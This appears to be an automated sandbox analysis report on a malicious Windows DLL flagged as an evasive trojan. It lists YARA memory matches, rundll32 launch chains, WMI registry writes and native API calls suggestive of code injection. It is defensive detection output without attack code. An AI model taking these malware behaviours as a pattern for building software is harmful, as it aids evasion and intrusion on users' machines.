                      Source: Yara matchFile source: 00000002.00000003.504380266.00000000033A8000.00000004.00000040.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000002.00000003.504256505.00000000033A8000.00000004.00000040.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000002.00000003.504206651.00000000033A8000.00000004.00000040.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000002.00000003.504111647.00000000033A8000.00000004.00000040.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000006.00000003.533633690.0000000005BD8000.00000004.00000040.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000006.00000003.533322281.0000000005BD8000.00000004.00000040.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000006.00000003.533883648.0000000005BD8000.00000004.00000040.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000002.00000003.504159265.00000000033A8000.00000004.00000040.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000006.00000003.668796165.000000000585F000.00000004.00000040.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000006.00000003.625115852.000000000595D000.00000004.00000040.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000002.00000003.547848145.000000000322B000.00000004.00000040.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000006.00000003.579417295.0000000005A5B000.00000004.00000040.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000002.00000003.504691166.00000000033A8000.00000004.00000040.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000002.00000003.504416763.00000000033A8000.00000004.00000040.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000006.00000003.533401474.0000000005BD8000.00000004.00000040.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000002.00000003.593657647.000000000312D000.00000004.00000040.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000006.00000003.533448207.0000000005BD8000.00000004.00000040.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000002.00000002.681690642.0000000002FB0000.00000004.00000040.sdmp, type: MEMORY
                      Source: Yara matchFile source: Process Memory Space: loaddll32.exe PID: 7088, type: MEMORYSTR
                      Source: Yara matchFile source: Process Memory Space: rundll32.exe PID: 4432, type: MEMORYSTR
                      Source: Yara matchFile source: 2.2.loaddll32.exe.2d494a0.1.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 10.3.rundll32.exe.10ba31a.0.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 5.3.rundll32.exe.10da31a.0.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 6.3.rundll32.exe.318a31a.0.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 6.2.rundll32.exe.6e8d0000.2.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 6.3.rundll32.exe.318a31a.0.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 9.2.rundll32.exe.6e8d0000.0.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 10.3.rundll32.exe.10ba31a.0.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 2.2.loaddll32.exe.6e8d0000.2.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 6.2.rundll32.exe.31a0000.0.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 9.0.rundll32.exe.6e8d0000.1.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 2.2.loaddll32.exe.2d494a0.1.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 2.2.loaddll32.exe.a30000.0.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 6.2.rundll32.exe.53794a0.1.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 6.2.rundll32.exe.53794a0.1.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 9.3.rundll32.exe.109a31a.0.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 9.0.rundll32.exe.6e8d0000.0.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 2.3.loaddll32.exe.b3a31a.0.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 9.3.rundll32.exe.109a31a.0.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 2.3.loaddll32.exe.b3a31a.0.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 5.3.rundll32.exe.10da31a.0.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 00000005.00000003.431870114.00000000010D0000.00000040.00000001.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000009.00000003.446004934.0000000001090000.00000040.00000001.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000002.00000003.468068395.0000000000B30000.00000040.00000001.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000006.00000002.682624549.0000000005379000.00000004.00000040.sdmp, type: MEMORY
                      Source: Yara matchFile source: 0000000A.00000003.469511127.00000000010B0000.00000040.00000001.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000006.00000003.430400747.0000000003180000.00000040.00000001.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000002.00000002.681378105.0000000002D49000.00000004.00000040.sdmp, type: MEMORY

                      System Summary:

                      barindex
                      Writes or reads registry keys via WMIShow sources
                      Source: C:\Windows\System32\loaddll32.exeWMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::GetStringValue
                      Source: C:\Windows\System32\loaddll32.exeWMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::SetDWORDValue
                      Source: C:\Windows\System32\loaddll32.exeWMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::SetBinaryValue
                      Source: C:\Windows\System32\loaddll32.exeWMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::SetStringValue
                      Writes registry values via WMIShow sources
                      Source: C:\Windows\System32\loaddll32.exeWMI Registry write: IWbemServices::ExecMethod - root\default : StdRegProv::SetDWORDValue
                      Source: C:\Windows\System32\loaddll32.exeWMI Registry write: IWbemServices::ExecMethod - root\default : StdRegProv::SetBinaryValue
                      Source: C:\Windows\System32\loaddll32.exeWMI Registry write: IWbemServices::ExecMethod - root\default : StdRegProv::SetStringValue
                      Source: C:\Windows\SysWOW64\rundll32.exeWMI Registry write: IWbemServices::ExecMethod - root\default : StdRegProv::SetDWORDValue
                      Source: C:\Windows\SysWOW64\rundll32.exeWMI Registry write: IWbemServices::ExecMethod - root\default : StdRegProv::SetBinaryValue
                      Source: C:\Windows\SysWOW64\rundll32.exeWMI Registry write: IWbemServices::ExecMethod - root\default : StdRegProv::SetStringValue
                      Source: 616412739e268.dllStatic PE information: 32BIT_MACHINE, EXECUTABLE_IMAGE, DLL
                      Source: C:\Windows\SysWOW64\rundll32.exeProcess created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -u -p 6084 -s 880
                      Source: C:\Windows\System32\loaddll32.exeCode function: 2_2_6E8D21B4
                      Source: C:\Windows\System32\loaddll32.exeCode function: 2_2_00A34C40
                      Source: C:\Windows\System32\loaddll32.exeCode function: 2_2_00A3AF24
                      Source: C:\Windows\System32\loaddll32.exeCode function: 2_2_00A32B76
                      Source: C:\Windows\System32\loaddll32.exeCode function: 2_2_6E8E5600
                      Source: C:\Windows\System32\loaddll32.exeCode function: 2_2_6E91D630
                      Source: C:\Windows\System32\loaddll32.exeCode function: 2_2_6E933CCE
                      Source: C:\Windows\System32\loaddll32.exeCode function: 2_2_6E91B597
                      Source: C:\Windows\System32\loaddll32.exeCode function: 2_2_6E92A2B1
                      Source: C:\Windows\System32\loaddll32.exeCode function: 2_2_6E90E8C0
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 6_2_031AAF24
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 6_2_031A2B76
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 6_2_031A4C40
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 6_2_6E8E5600
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 6_2_6E91D630
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 6_2_6E933CCE
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 6_2_6E91B597
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 6_2_6E92A2B1
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 6_2_6E93FA78
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 6_2_6E90E8C0
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 9_2_6E8E5600
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 9_2_6E91D630
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 9_2_6E933CCE
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 9_2_6E91B597
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 9_2_6E92A2B1
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 9_2_6E90E8C0
                      Source: C:\Windows\System32\loaddll32.exeCode function: String function: 6E90ABD1 appears 91 times
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: String function: 6E90AEC0 appears 36 times
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: String function: 6E90ABD1 appears 182 times
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: String function: 6E918487 appears 34 times
                      Source: C:\Windows\System32\loaddll32.exeCode function: 2_2_6E8D13B8 GetProcAddress,NtCreateSection,memset,
                      Source: C:\Windows\System32\loaddll32.exeCode function: 2_2_6E8D15C6 SetThreadPriority,NtQuerySystemInformation,Sleep,GetLongPathNameW,GetLongPathNameW,GetLongPathNameW,GetLastError,WaitForSingleObject,GetExitCodeThread,CloseHandle,GetLastError,GetLastError,
                      Source: C:\Windows\System32\loaddll32.exeCode function: 2_2_6E8D1273 NtMapViewOfSection,
                      Source: C:\Windows\System32\loaddll32.exeCode function: 2_2_6E8D23D5 NtQueryVirtualMemory,
                      Source: C:\Windows\System32\loaddll32.exeCode function: 2_2_00A35D10 NtOpenProcess,NtOpenProcessToken,NtQueryInformationToken,NtQueryInformationToken,NtQueryInformationToken,memcpy,NtClose,NtClose,
                      Source: C:\Windows\System32\loaddll32.exeCode function: 2_2_00A3B149 NtQueryVirtualMemory,
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 6_2_031A5D10 NtOpenProcess,NtOpenProcessToken,NtQueryInformationToken,NtQueryInformationToken,NtQueryInformationToken,memcpy,NtClose,NtClose,
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 6_2_031AB149 NtQueryVirtualMemory,
                      Source: 616412739e268.dllReversingLabs: Detection: 24%
                      Source: 616412739e268.dllStatic PE information: Section: .text IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
                      Source: C:\Windows\System32\loaddll32.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers
                      Source: unknownProcess created: C:\Windows\System32\loaddll32.exe loaddll32.exe 'C:\Users\user\Desktop\616412739e268.dll'
                      Source: C:\Windows\System32\loaddll32.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd.exe /C rundll32.exe 'C:\Users\user\Desktop\616412739e268.dll',#1
                      Source: C:\Windows\System32\loaddll32.exeProcess created: C:\Windows\SysWOW64\rundll32.exe rundll32.exe C:\Users\user\Desktop\616412739e268.dll,BeGrass
                      Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\rundll32.exe rundll32.exe 'C:\Users\user\Desktop\616412739e268.dll',#1
                      Source: C:\Windows\System32\loaddll32.exeProcess created: C:\Windows\SysWOW64\rundll32.exe rundll32.exe C:\Users\user\Desktop\616412739e268.dll,Fieldeight
                      Source: C:\Windows\System32\loaddll32.exeProcess created: C:\Windows\SysWOW64\rundll32.exe rundll32.exe C:\Users\user\Desktop\616412739e268.dll,Often
                      Source: C:\Windows\SysWOW64\rundll32.exeProcess created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -u -p 6084 -s 880
                      Source: C:\Windows\SysWOW64\rundll32.exeProcess created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -u -p 6012 -s 628
                      Source: C:\Windows\SysWOW64\rundll32.exeProcess created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -u -p 4360 -s 848
                      Source: C:\Windows\System32\loaddll32.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd.exe /C rundll32.exe 'C:\Users\user\Desktop\616412739e268.dll',#1
                      Source: C:\Windows\System32\loaddll32.exeProcess created: C:\Windows\SysWOW64\rundll32.exe rundll32.exe C:\Users\user\Desktop\616412739e268.dll,BeGrass
                      Source: C:\Windows\System32\loaddll32.exeProcess created: C:\Windows\SysWOW64\rundll32.exe rundll32.exe C:\Users\user\Desktop\616412739e268.dll,Fieldeight
                      Source: C:\Windows\System32\loaddll32.exeProcess created: C:\Windows\SysWOW64\rundll32.exe rundll32.exe C:\Users\user\Desktop\616412739e268.dll,Often
                      Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\rundll32.exe rundll32.exe 'C:\Users\user\Desktop\616412739e268.dll',#1
                      Source: C:\Windows\System32\loaddll32.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{4590F811-1D3A-11D0-891F-00AA004B2E24}\InprocServer32
                      Source: C:\Windows\SysWOW64\WerFault.exeFile created: C:\ProgramData\Microsoft\Windows\WER\Temp\WER923.tmpJump to behavior
                      Source: classification engineClassification label: mal88.troj.evad.winDLL@14/12@15/5
                      Source: C:\Windows\System32\loaddll32.exeCode function: 2_2_00A34A03 CreateToolhelp32Snapshot,Process32First,Process32Next,CloseHandle,
                      Source: C:\Windows\System32\loaddll32.exeProcess created: C:\Windows\SysWOW64\rundll32.exe rundll32.exe C:\Users\user\Desktop\616412739e268.dll,BeGrass
                      Source: C:\Windows\SysWOW64\WerFault.exeMutant created: \Sessions\1\BaseNamedObjects\Local\WERReportingForProcess6084
                      Source: C:\Windows\SysWOW64\WerFault.exeMutant created: \Sessions\1\BaseNamedObjects\Local\WERReportingForProcess6012
                      Source: C:\Windows\SysWOW64\WerFault.exeMutant created: \Sessions\1\BaseNamedObjects\Local\WERReportingForProcess4360
                      Source: C:\Windows\System32\loaddll32.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
                      Source: C:\Windows\System32\loaddll32.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
                      Source: C:\Windows\SysWOW64\rundll32.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
                      Source: C:\Windows\SysWOW64\rundll32.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
                      Source: C:\Windows\SysWOW64\WerFault.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
                      Source: C:\Windows\SysWOW64\WerFault.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
                      Source: C:\Windows\SysWOW64\WerFault.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
                      Source: C:\Windows\SysWOW64\WerFault.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
                      Source: C:\Windows\SysWOW64\WerFault.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
                      Source: C:\Windows\SysWOW64\WerFault.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
                      Source: C:\Windows\SysWOW64\rundll32.exeAutomated click: OK
                      Source: C:\Windows\SysWOW64\rundll32.exeAutomated click: OK
                      Source: C:\Windows\SysWOW64\rundll32.exeAutomated click: OK
                      Source: C:\Windows\SysWOW64\rundll32.exeAutomated click: OK
                      Source: 616412739e268.dllStatic PE information: DYNAMIC_BASE, NX_COMPAT
                      Source: 616412739e268.dllStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG
                      Source: Binary string: WinTypes.pdb source: WerFault.exe, 00000012.00000003.512903037.00000000056F7000.00000004.00000040.sdmp, WerFault.exe, 00000016.00000003.524451531.00000000050E8000.00000004.00000040.sdmp, WerFault.exe, 00000018.00000003.535082330.0000000004BC7000.00000004.00000040.sdmp
                      Source: Binary string: CoreUIComponents.pdbm source: WerFault.exe, 00000016.00000003.524451531.00000000050E8000.00000004.00000040.sdmp
                      Source: Binary string: wkernel32.pdb source: WerFault.exe, 00000012.00000003.512757013.00000000055E1000.00000004.00000001.sdmp, WerFault.exe, 00000016.00000003.524272653.0000000004F51000.00000004.00000001.sdmp, WerFault.exe, 00000018.00000003.521737000.0000000000905000.00000004.00000001.sdmp
                      Source: Binary string: bcrypt.pdb source: WerFault.exe, 00000012.00000003.512903037.00000000056F7000.00000004.00000040.sdmp, WerFault.exe, 00000016.00000003.524451531.00000000050E8000.00000004.00000040.sdmp, WerFault.exe, 00000018.00000003.535082330.0000000004BC7000.00000004.00000040.sdmp
                      Source: Binary string: sfc_os.pdb source: WerFault.exe, 00000012.00000003.512903037.00000000056F7000.00000004.00000040.sdmp, WerFault.exe, 00000016.00000003.524451531.00000000050E8000.00000004.00000040.sdmp, WerFault.exe, 00000018.00000003.535082330.0000000004BC7000.00000004.00000040.sdmp
                      Source: Binary string: ucrtbase.pdb source: WerFault.exe, 00000012.00000003.512757013.00000000055E1000.00000004.00000001.sdmp, WerFault.exe, 00000016.00000003.524096098.00000000050E2000.00000004.00000040.sdmp, WerFault.exe, 00000018.00000003.534288689.0000000004BF1000.00000004.00000001.sdmp
                      Source: Binary string: shlwapi.pdb7 source: WerFault.exe, 00000012.00000003.512903037.00000000056F7000.00000004.00000040.sdmp
                      Source: Binary string: CoreMessaging.pdb_ source: WerFault.exe, 00000012.00000003.512855279.0000000005701000.00000004.00000040.sdmp, WerFault.exe, 00000016.00000003.524487257.00000000050F4000.00000004.00000040.sdmp, WerFault.exe, 00000018.00000003.535082330.0000000004BC7000.00000004.00000040.sdmp
                      Source: Binary string: shlwapi.pdb.{Y@e source: WerFault.exe, 00000018.00000003.535082330.0000000004BC7000.00000004.00000040.sdmp
                      Source: Binary string: msvcrt.pdb source: WerFault.exe, 00000012.00000003.512757013.00000000055E1000.00000004.00000001.sdmp, WerFault.exe, 00000016.00000003.524272653.0000000004F51000.00000004.00000001.sdmp, WerFault.exe, 00000018.00000003.534288689.0000000004BF1000.00000004.00000001.sdmp
                      Source: Binary string: wrpcrt4.pdb source: WerFault.exe, 00000012.00000003.512884902.00000000056F0000.00000004.00000040.sdmp, WerFault.exe, 00000016.00000003.524424631.00000000050E0000.00000004.00000040.sdmp, WerFault.exe, 00000018.00000003.534997443.0000000004BC0000.00000004.00000040.sdmp
                      Source: Binary string: wntdll.pdb source: WerFault.exe, 00000012.00000003.512757013.00000000055E1000.00000004.00000001.sdmp, WerFault.exe, 00000016.00000003.524272653.0000000004F51000.00000004.00000001.sdmp, WerFault.exe, 00000018.00000003.521724684.00000000008FF000.00000004.00000001.sdmp
                      Source: Binary string: cryptbase.pdbf{ source: WerFault.exe, 00000018.00000003.535082330.0000000004BC7000.00000004.00000040.sdmp
                      Source: Binary string: combase.pdbl{ source: WerFault.exe, 00000018.00000003.535082330.0000000004BC7000.00000004.00000040.sdmp
                      Source: Binary string: imagehlp.pdb/ source: WerFault.exe, 00000012.00000003.512903037.00000000056F7000.00000004.00000040.sdmp
                      Source: Binary string: CoreMessaging.pdb source: WerFault.exe, 00000012.00000003.512855279.0000000005701000.00000004.00000040.sdmp, WerFault.exe, 00000016.00000003.524487257.00000000050F4000.00000004.00000040.sdmp, WerFault.exe, 00000018.00000003.535082330.0000000004BC7000.00000004.00000040.sdmp
                      Source: Binary string: shcore.pdb source: WerFault.exe, 00000012.00000003.512896544.00000000056F4000.00000004.00000040.sdmp, WerFault.exe, 00000016.00000003.524096098.00000000050E2000.00000004.00000040.sdmp, WerFault.exe, 00000018.00000003.535030009.0000000004BC4000.00000004.00000040.sdmp
                      Source: Binary string: wgdi32.pdb source: WerFault.exe, 00000012.00000003.512757013.00000000055E1000.00000004.00000001.sdmp, WerFault.exe, 00000016.00000003.524272653.0000000004F51000.00000004.00000001.sdmp, WerFault.exe, 00000018.00000003.534288689.0000000004BF1000.00000004.00000001.sdmp
                      Source: Binary string: fltLib.pdb source: WerFault.exe, 00000012.00000003.512903037.00000000056F7000.00000004.00000040.sdmp, WerFault.exe, 00000016.00000003.524451531.00000000050E8000.00000004.00000040.sdmp, WerFault.exe, 00000018.00000003.535082330.0000000004BC7000.00000004.00000040.sdmp
                      Source: Binary string: advapi32.pdb source: WerFault.exe, 00000012.00000003.512903037.00000000056F7000.00000004.00000040.sdmp, WerFault.exe, 00000016.00000003.524451531.00000000050E8000.00000004.00000040.sdmp, WerFault.exe, 00000018.00000003.535082330.0000000004BC7000.00000004.00000040.sdmp
                      Source: Binary string: rundll32.pdbk source: WerFault.exe, 00000012.00000003.512757013.00000000055E1000.00000004.00000001.sdmp, WerFault.exe, 00000018.00000003.534288689.0000000004BF1000.00000004.00000001.sdmp
                      Source: Binary string: wsspicli.pdb source: WerFault.exe, 00000012.00000003.512903037.00000000056F7000.00000004.00000040.sdmp, WerFault.exe, 00000016.00000003.524451531.00000000050E8000.00000004.00000040.sdmp, WerFault.exe, 00000018.00000003.535082330.0000000004BC7000.00000004.00000040.sdmp
                      Source: Binary string: oCReportStore::Prune: MaxReportCount=%d MaxSizeInMb=%dRSDSwkernel32.pdb source: WerFault.exe, 00000012.00000002.529162256.0000000002F92000.00000004.00000001.sdmp, WerFault.exe, 00000018.00000002.551332599.0000000000632000.00000004.00000001.sdmp
                      Source: Binary string: shell32.pdb source: WerFault.exe, 00000012.00000003.512757013.00000000055E1000.00000004.00000001.sdmp, WerFault.exe, 00000016.00000003.524096098.00000000050E2000.00000004.00000040.sdmp, WerFault.exe, 00000018.00000003.534288689.0000000004BF1000.00000004.00000001.sdmp
                      Source: Binary string: winspool.pdb6{1@ source: WerFault.exe, 00000018.00000003.535082330.0000000004BC7000.00000004.00000040.sdmp
                      Source: Binary string: imagehlp.pdb0{?@ source: WerFault.exe, 00000018.00000003.535082330.0000000004BC7000.00000004.00000040.sdmp
                      Source: Binary string: msvcp_win.pdbk source: WerFault.exe, 00000016.00000003.524096098.00000000050E2000.00000004.00000040.sdmp
                      Source: Binary string: advapi32.pdb({G@r source: WerFault.exe, 00000018.00000003.535082330.0000000004BC7000.00000004.00000040.sdmp
                      Source: Binary string: ntmarta.pdb source: WerFault.exe, 00000012.00000003.512903037.00000000056F7000.00000004.00000040.sdmp, WerFault.exe, 00000016.00000003.524451531.00000000050E8000.00000004.00000040.sdmp, WerFault.exe, 00000018.00000003.535082330.0000000004BC7000.00000004.00000040.sdmp
                      Source: Binary string: msvcp_win.pdb source: WerFault.exe, 00000012.00000003.512757013.00000000055E1000.00000004.00000001.sdmp, WerFault.exe, 00000016.00000003.524096098.00000000050E2000.00000004.00000040.sdmp, WerFault.exe, 00000018.00000003.534288689.0000000004BF1000.00000004.00000001.sdmp
                      Source: Binary string: bcrypt.pdb0 source: WerFault.exe, 00000018.00000003.535082330.0000000004BC7000.00000004.00000040.sdmp
                      Source: Binary string: wimm32.pdb source: WerFault.exe, 00000012.00000003.512903037.00000000056F7000.00000004.00000040.sdmp, WerFault.exe, 00000016.00000003.524451531.00000000050E8000.00000004.00000040.sdmp, WerFault.exe, 00000018.00000003.535082330.0000000004BC7000.00000004.00000040.sdmp
                      Source: Binary string: wkernelbase.pdb source: WerFault.exe, 00000012.00000003.512757013.00000000055E1000.00000004.00000001.sdmp, WerFault.exe, 00000016.00000003.524272653.0000000004F51000.00000004.00000001.sdmp, WerFault.exe, 00000018.00000003.534288689.0000000004BF1000.00000004.00000001.sdmp
                      Source: Binary string: CoreUIComponents.pdb source: WerFault.exe, 00000012.00000003.512903037.00000000056F7000.00000004.00000040.sdmp, WerFault.exe, 00000016.00000003.524451531.00000000050E8000.00000004.00000040.sdmp, WerFault.exe, 00000018.00000003.535082330.0000000004BC7000.00000004.00000040.sdmp
                      Source: Binary string: shlwapi.pdb source: WerFault.exe, 00000012.00000003.512903037.00000000056F7000.00000004.00000040.sdmp, WerFault.exe, 00000016.00000003.524451531.00000000050E8000.00000004.00000040.sdmp, WerFault.exe, 00000018.00000003.535082330.0000000004BC7000.00000004.00000040.sdmp
                      Source: Binary string: mpr.pdb source: WerFault.exe, 00000012.00000003.512884902.00000000056F0000.00000004.00000040.sdmp, WerFault.exe, 00000016.00000003.524424631.00000000050E0000.00000004.00000040.sdmp, WerFault.exe, 00000018.00000003.534997443.0000000004BC0000.00000004.00000040.sdmp
                      Source: Binary string: wwin32u.pdb source: WerFault.exe, 00000012.00000003.512757013.00000000055E1000.00000004.00000001.sdmp, WerFault.exe, 00000016.00000003.524272653.0000000004F51000.00000004.00000001.sdmp, WerFault.exe, 00000018.00000003.534288689.0000000004BF1000.00000004.00000001.sdmp
                      Source: Binary string: setupapi.pdb source: WerFault.exe, 00000012.00000003.512903037.00000000056F7000.00000004.00000040.sdmp, WerFault.exe, 00000016.00000003.524451531.00000000050E8000.00000004.00000040.sdmp, WerFault.exe, 00000018.00000003.535082330.0000000004BC7000.00000004.00000040.sdmp
                      Source: Binary string: wUxTheme.pdb source: WerFault.exe, 00000012.00000003.512903037.00000000056F7000.00000004.00000040.sdmp, WerFault.exe, 00000016.00000003.524451531.00000000050E8000.00000004.00000040.sdmp, WerFault.exe, 00000018.00000003.535082330.0000000004BC7000.00000004.00000040.sdmp
                      Source: Binary string: imagehlp.pdb source: WerFault.exe, 00000012.00000003.512903037.00000000056F7000.00000004.00000040.sdmp, WerFault.exe, 00000016.00000003.524451531.00000000050E8000.00000004.00000040.sdmp, WerFault.exe, 00000018.00000003.535082330.0000000004BC7000.00000004.00000040.sdmp
                      Source: Binary string: upwntdll.pdb source: WerFault.exe, 00000016.00000003.516470114.0000000004CA2000.00000004.00000001.sdmp
                      Source: Binary string: dwmapi.pdb source: WerFault.exe, 00000012.00000003.512903037.00000000056F7000.00000004.00000040.sdmp, WerFault.exe, 00000016.00000003.524451531.00000000050E8000.00000004.00000040.sdmp, WerFault.exe, 00000018.00000003.535082330.0000000004BC7000.00000004.00000040.sdmp
                      Source: Binary string: shcore.pdbk source: WerFault.exe, 00000012.00000003.512896544.00000000056F4000.00000004.00000040.sdmp, WerFault.exe, 00000016.00000003.524096098.00000000050E2000.00000004.00000040.sdmp, WerFault.exe, 00000018.00000003.535030009.0000000004BC4000.00000004.00000040.sdmp
                      Source: Binary string: wntdll.pdb( source: WerFault.exe, 00000018.00000003.521724684.00000000008FF000.00000004.00000001.sdmp
                      Source: Binary string: mpr.pdbn source: WerFault.exe, 00000016.00000003.524424631.00000000050E0000.00000004.00000040.sdmp
                      Source: Binary string: profapi.pdb source: WerFault.exe, 00000012.00000003.512903037.00000000056F7000.00000004.00000040.sdmp, WerFault.exe, 00000016.00000003.524451531.00000000050E8000.00000004.00000040.sdmp, WerFault.exe, 00000018.00000003.535082330.0000000004BC7000.00000004.00000040.sdmp
                      Source: Binary string: winspool.pdb source: WerFault.exe, 00000012.00000003.512903037.00000000056F7000.00000004.00000040.sdmp, WerFault.exe, 00000016.00000003.524451531.00000000050E8000.00000004.00000040.sdmp, WerFault.exe, 00000018.00000003.535082330.0000000004BC7000.00000004.00000040.sdmp
                      Source: Binary string: wgdi32full.pdb source: WerFault.exe, 00000012.00000003.512757013.00000000055E1000.00000004.00000001.sdmp, WerFault.exe, 00000016.00000003.524272653.0000000004F51000.00000004.00000001.sdmp, WerFault.exe, 00000018.00000003.534288689.0000000004BF1000.00000004.00000001.sdmp
                      Source: Binary string: shell32.pdbk source: WerFault.exe, 00000016.00000003.524096098.00000000050E2000.00000004.00000040.sdmp
                      Source: Binary string: sechost.pdb source: WerFault.exe, 00000012.00000003.512903037.00000000056F7000.00000004.00000040.sdmp, WerFault.exe, 00000016.00000003.524451531.00000000050E8000.00000004.00000040.sdmp, WerFault.exe, 00000018.00000003.535082330.0000000004BC7000.00000004.00000040.sdmp
                      Source: Binary string: iphlpapi.pdb source: WerFault.exe, 00000012.00000003.512903037.00000000056F7000.00000004.00000040.sdmp, WerFault.exe, 00000016.00000003.524451531.00000000050E8000.00000004.00000040.sdmp, WerFault.exe, 00000018.00000003.535082330.0000000004BC7000.00000004.00000040.sdmp
                      Source: Binary string: propsys.pdbQ source: WerFault.exe, 00000012.00000003.512903037.00000000056F7000.00000004.00000040.sdmp
                      Source: Binary string: propsys.pdb source: WerFault.exe, 00000012.00000003.512903037.00000000056F7000.00000004.00000040.sdmp, WerFault.exe, 00000016.00000003.524451531.00000000050E8000.00000004.00000040.sdmp, WerFault.exe, 00000018.00000003.535082330.0000000004BC7000.00000004.00000040.sdmp
                      Source: Binary string: wimm32.pdbA source: WerFault.exe, 00000016.00000003.524451531.00000000050E8000.00000004.00000040.sdmp
                      Source: Binary string: cfgmgr32.pdbk source: WerFault.exe, 00000012.00000003.512896544.00000000056F4000.00000004.00000040.sdmp, WerFault.exe, 00000016.00000003.524096098.00000000050E2000.00000004.00000040.sdmp, WerFault.exe, 00000018.00000003.535030009.0000000004BC4000.00000004.00000040.sdmp
                      Source: Binary string: ucrtbase.pdbk source: WerFault.exe, 00000016.00000003.524096098.00000000050E2000.00000004.00000040.sdmp
                      Source: Binary string: wUxTheme.pdb<{K@a source: WerFault.exe, 00000018.00000003.535082330.0000000004BC7000.00000004.00000040.sdmp
                      Source: Binary string: advapi32.pdb9 source: WerFault.exe, 00000012.00000003.512903037.00000000056F7000.00000004.00000040.sdmp
